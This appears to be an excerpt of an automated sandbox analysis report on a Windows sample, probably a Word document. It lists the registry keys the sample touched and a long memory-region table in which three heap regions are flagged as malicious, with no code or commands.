HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\6F2B8
6F2B8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
There are 429 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
3590000
heap
page read and write
malicious
3920000
heap
page read and write
malicious
3530000
heap
page read and write
malicious
8897000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
97D5000
trusted library allocation
page read and write
9A55000
trusted library allocation
page read and write
989E000
heap
page read and write
883D000
trusted library allocation
page read and write
53CF000
heap
page read and write
4DAE000
stack
page read and write
A680000
trusted library allocation
page read and write
85C0000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
A6B3000
trusted library allocation
page read and write
8771000
heap
page read and write
97A0000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
53F5000
heap
page read and write
8890000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
5586000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
5530000
heap
page execute and read and write
97D0000
trusted library allocation
page read and write
A690000
trusted library allocation
page read and write
A720000
trusted library allocation
page execute and read and write
8860000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
33F7000
heap
page read and write
7780000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
8835000
unkown
page read and write
A6D0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
5300000
direct allocation
page read and write
86D0000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
8896000
trusted library allocation
page read and write
17DC7002000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
7700000
trusted library allocation
page read and write
17DC683F000
heap
page read and write
8880000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
8830000
unkown
page read and write
A685000
trusted library allocation
page read and write
53DE000
stack
page read and write
9A4A000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
52B8000
heap
page read and write
4E9E000
stack
page read and write
34C7000
stack
page read and write
97E0000
trusted library allocation
page read and write
53EF000
heap
page read and write
9760000
trusted library allocation
page read and write
95E9000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
8890000
unkown
page read and write
9B40000
trusted library allocation
page read and write
33C7000
heap
page read and write
97A0000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
9B80000
trusted library allocation
page read and write
88B0000
trusted library allocation
page read and write
9B00000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
A76D000
stack
page read and write
98E0000
unkown
page read and write
8850000
unkown
page read and write
A670000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
4D70000
heap
page read and write
8890000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
5CDD000
stack
page read and write
8880000
unkown
page read and write
9730000
trusted library allocation
page read and write
8763000
heap
page read and write
A6D0000
trusted library allocation
page read and write
79C0000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
33A0000
trusted library section
page read and write
4F42000
heap
page read and write
5350000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9B37000
trusted library allocation
page read and write
539E000
stack
page read and write
9A12000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
86DB000
heap
page read and write
A6F0000
trusted library allocation
page read and write
368E000
heap
page read and write
9A30000
trusted library allocation
page read and write
9C50000
trusted library allocation
page read and write
9683000
trusted library allocation
page read and write
76D0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
5588000
heap
page read and write
A700000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
97A5000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
5481000
direct allocation
page read and write
8830000
unkown
page read and write
97C0000
trusted library allocation
page read and write
7710000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
8835000
trusted library allocation
page read and write
53FE000
heap
page read and write
85C0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
4EB0000
heap
page read and write
A685000
trusted library allocation
page read and write
9E0000
direct allocation
page read and write
A650000
trusted library allocation
page read and write
9606000
trusted library allocation
page read and write
76C0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
76F0000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
5330000
direct allocation
page read and write
52C4000
heap
page read and write
9750000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
5260000
heap
page read and write
A6CE000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
78C0000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
5200000
direct allocation
page read and write
9A30000
trusted library allocation
page execute and read and write
99F0000
trusted library allocation
page read and write
8600000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
95C0000
unkown
page read and write
9602000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
9680000
trusted library allocation
page read and write
6BF5B7F000
stack
page read and write
9840000
trusted library allocation
page read and write
86B0000
heap
page read and write
A650000
trusted library allocation
page read and write
A690000
trusted library allocation
page read and write
527F000
stack
page read and write
9B40000
trusted library allocation
page read and write
4D5D000
stack
page read and write
49E0000
heap
page read and write
8850000
unkown
page read and write
9790000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
51FA000
stack
page read and write
9990000
trusted library allocation
page read and write
A684000
trusted library allocation
page read and write
52C4000
heap
page read and write
95E9000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
553B000
heap
page read and write
A6D0000
trusted library allocation
page read and write
52C0000
heap
page read and write
9A00000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
17DC6902000
heap
page read and write
97E0000
trusted library allocation
page read and write
9B57000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
97D0000
unkown
page read and write
97E0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
5557000
heap
page read and write
A670000
trusted library allocation
page read and write
9765000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
95C6000
unkown
page read and write
A6A0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
5585000
heap
page read and write
85B0000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
5BE2000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
A6F0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9873000
heap
page read and write
9C70000
trusted library allocation
page read and write
9C15000
trusted library allocation
page read and write
9AE0000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
9A50000
unkown
page read and write
A680000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
51CF000
stack
page read and write
2E40000
heap
page read and write
9750000
trusted library allocation
page read and write
5474000
direct allocation
page read and write
9760000
trusted library allocation
page read and write
4F2A000
heap
page read and write
52AB000
heap
page read and write
97D0000
trusted library allocation
page read and write
8600000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9D40000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
85E0000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
5448000
trusted library allocation
page read and write
5320000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
9A20000
unkown
page read and write
95D0000
trusted library allocation
page read and write
79C0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
5BE2000
heap
page read and write
9A20000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
85D0000
trusted library allocation
page execute and read and write
9A10000
trusted library allocation
page read and write
95C0000
unkown
page read and write
8751000
heap
page read and write
9690000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
4EF1000
heap
page read and write
9BE0000
trusted library allocation
page read and write
4F1D000
heap
page read and write
97C1000
trusted library allocation
page read and write
8839000
unkown
page read and write
8775000
heap
page read and write
8860000
unkown
page read and write
79C4000
trusted library allocation
page read and write
8701000
heap
page read and write
9800000
unkown
page read and write
85E0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
7080000
heap
page read and write
A6B0000
trusted library allocation
page read and write
9790000
unkown
page read and write
A680000
trusted library allocation
page read and write
494E000
stack
page read and write
8885000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
95DD000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
4E62000
direct allocation
page read and write
8880000
trusted library allocation
page read and write
A6F0000
trusted library allocation
page read and write
77D0000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
55A5000
heap
page read and write
7A21000
heap
page read and write
9BA0000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
8830000
unkown
page read and write
95D0000
unkown
page read and write
9C10000
trusted library allocation
page read and write
76A0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
5590000
heap
page read and write
8880000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
7B5E000
stack
page read and write
533F000
direct allocation
page read and write
A650000
trusted library allocation
page read and write
5BB1000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
6643000
trusted library allocation
page read and write
4CE0000
heap
page read and write
9A40000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
539F000
heap
page read and write
9810000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
5BF1000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
78B0000
trusted library allocation
page execute and read and write
9760000
trusted library allocation
page read and write
8835000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
A6D8000
trusted library allocation
page read and write
5C0F000
stack
page read and write
2FD0000
heap
page read and write
4E1E000
stack
page read and write
A680000
trusted library allocation
page read and write
546E000
stack
page read and write
8830000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
5110000
heap
page read and write
97E0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
6BF539C000
stack
page read and write
97EF000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
52D0000
direct allocation
page read and write
9B20000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
9B30000
trusted library allocation
page execute and read and write
52C4000
heap
page read and write
52F0000
heap
page read and write
8850000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
5300000
trusted library allocation
page read and write
A690000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
A6B8000
trusted library allocation
page read and write
65E1000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
5AAC000
trusted library allocation
page read and write
86F1000
heap
page read and write
5BA0000
heap
page read and write
A680000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
4EDF000
heap
page read and write
9830000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
5C40000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
4E60000
direct allocation
page read and write
9750000
trusted library allocation
page read and write
9B00000
trusted library allocation
page read and write
8865000
trusted library allocation
page read and write
54E0000
heap
page read and write
97D0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
97E0000
unkown
page read and write
76A9000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
86FF000
heap
page read and write
8860000
unkown
page read and write
9790000
trusted library allocation
page read and write
5260000
direct allocation
page read and write
55B1000
heap
page read and write
8860000
trusted library allocation
page read and write
5BA0000
trusted library allocation
page read and write
A690000
trusted library section
page read and write
8865000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
9A50000
trusted library allocation
page read and write
8670000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
78A1000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
53C8000
heap
page read and write
9780000
trusted library allocation
page read and write
53E0000
heap
page readonly
53B0000
direct allocation
page read and write
85D0000
trusted library allocation
page read and write
8866000
trusted library allocation
page read and write
7BE0000
unkown
page read and write
5518000
heap
page read and write
503E000
stack
page read and write
9810000
trusted library allocation
page read and write
9A20000
trusted library allocation
page execute and read and write
85F0000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
4E5E000
stack
page read and write
53F0000
direct allocation
page read and write
9BB0000
trusted library allocation
page read and write
95E0000
unkown
page read and write
76C0000
trusted library allocation
page read and write
5C5B000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
55E1000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
7760000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
9A40000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
79BE000
stack
page read and write
9871000
heap
page read and write
875A000
heap
page read and write
9750000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9BF0000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
9B29000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
8830000
unkown
page read and write
9B10000
unkown
page read and write
98F0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
8856000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
5337000
trusted library allocation
page execute and read and write
99F0000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
95C5000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
9A40000
trusted library allocation
page read and write
5334000
direct allocation
page read and write
877D000
heap
page read and write
8710000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
85CC000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
52F0000
trusted library allocation
page read and write
F50000
heap
page read and write
8830000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
4EED000
heap
page read and write
9760000
trusted library allocation
page read and write
98A1000
heap
page read and write
99F0000
trusted library allocation
page execute and read and write
574F000
stack
page read and write
8880000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
52C0000
heap
page read and write
53A0000
heap
page read and write
97D0000
trusted library allocation
page read and write
95C0000
unkown
page read and write
9CC0000
trusted library allocation
page read and write
9870000
heap
page read and write
8830000
trusted library allocation
page read and write
9690000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
9C50000
unkown
page read and write
86B0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
7BF8000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
9858000
trusted library allocation
page read and write
55C1000
heap
page read and write
95C8000
unkown
page read and write
75F0000
trusted library allocation
page read and write
53F7000
heap
page read and write
8855000
trusted library allocation
page read and write
17DC6813000
heap
page read and write
9900000
unkown
page read and write
876F000
heap
page read and write
9790000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
9600000
unkown
page read and write
94AD000
stack
page read and write
7BEF000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
5BC8000
heap
page read and write
A6E0000
trusted library allocation
page read and write
9BD3000
unkown
page read and write
9B15000
unkown
page read and write
3601000
heap
page read and write
97F0000
trusted library allocation
page execute and read and write
7680000
trusted library allocation
page read and write
95D0000
unkown
page read and write
8890000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
A670000
trusted library allocation
page read and write
17DC6660000
heap
page read and write
9690000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
5380000
heap
page read and write
8880000
unkown
page read and write
A6F0000
trusted library allocation
page read and write
8830000
unkown
page read and write
3536000
heap
page read and write
9810000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
9BA0000
unkown
page read and write
7760000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
77C0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
85B0000
trusted library allocation
page read and write
95AC000
stack
page read and write
8860000
unkown
page read and write
8890000
trusted library allocation
page read and write
9A1F000
trusted library allocation
page read and write
5BC4000
heap
page read and write
A660000
trusted library allocation
page read and write
A6F0000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
52EC000
heap
page read and write
A6D0000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
6BF57FE000
stack
page read and write
9760000
trusted library allocation
page read and write
35FB000
heap
page read and write
9A30000
trusted library allocation
page read and write
8890000
unkown
page read and write
99AE000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
85F0000
trusted library allocation
page read and write
95D8000
unkown
page read and write
88A0000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
900000
heap
page read and write
97C0000
trusted library allocation
page read and write
A707000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
9628000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
5580000
heap
page read and write
85E4000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
5390000
direct allocation
page read and write
9760000
trusted library allocation
page read and write
8890000
unkown
page read and write
8880000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
5510000
direct allocation
page read and write
95C0000
unkown
page read and write
A6E0000
trusted library allocation
page read and write
9A40000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
5A9E000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
3647000
heap
page read and write
A670000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
85F0000
trusted library allocation
page read and write
356F000
stack
page read and write
95D0000
trusted library allocation
page read and write
9950000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
8865000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
9675000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9800000
unkown
page read and write
8890000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
558D000
heap
page read and write
52C0000
heap
page read and write
9840000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9820000
trusted library allocation
page execute and read and write
7BFC000
trusted library allocation
page read and write
4EE6000
heap
page read and write
9830000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
7BF0000
trusted library allocation
page read and write
85B0000
trusted library allocation
page read and write
5F0000
heap
page read and write
A700000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
8887000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
A6F0000
trusted library allocation
page read and write
97D6000
trusted library allocation
page read and write
9670000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
8885000
trusted library allocation
page read and write
4830000
heap
page read and write
3608000
heap
page read and write
9B84000
unkown
page read and write
572B000
trusted library allocation
page read and write
5C8A000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
2F3C000
stack
page read and write
352B000
heap
page read and write
A6D0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
350E000
stack
page read and write
8880000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
5280000
direct allocation
page read and write
97C000
stack
page read and write
5310000
direct allocation
page read and write
A6D0000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
9A40000
trusted library allocation
page read and write
99D5000
trusted library allocation
page read and write
9800000
unkown
page read and write
8890000
trusted library allocation
page read and write
31E0000
heap
page read and write
9B40000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
9680000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
A685000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
9A50000
unkown
page read and write
9610000
unkown
page read and write
5B67000
trusted library allocation
page read and write
5C6C000
trusted library allocation
page read and write
2EFC000
stack
page read and write
9A50000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
7C06000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
A700000
trusted library allocation
page read and write
95D5000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
7620000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
9AE0000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
55D0000
heap
page execute and read and write
85C0000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
9B10000
unkown
page read and write
9B10000
trusted library allocation
page read and write
35B0000
heap
page read and write
9750000
trusted library allocation
page read and write
98E0000
trusted library allocation
page read and write
98A1000
heap
page read and write
A6BE000
trusted library allocation
page read and write
85B0000
trusted library allocation
page read and write
5335000
trusted library allocation
page execute and read and write
A3D000
stack
page read and write
508F000
stack
page read and write
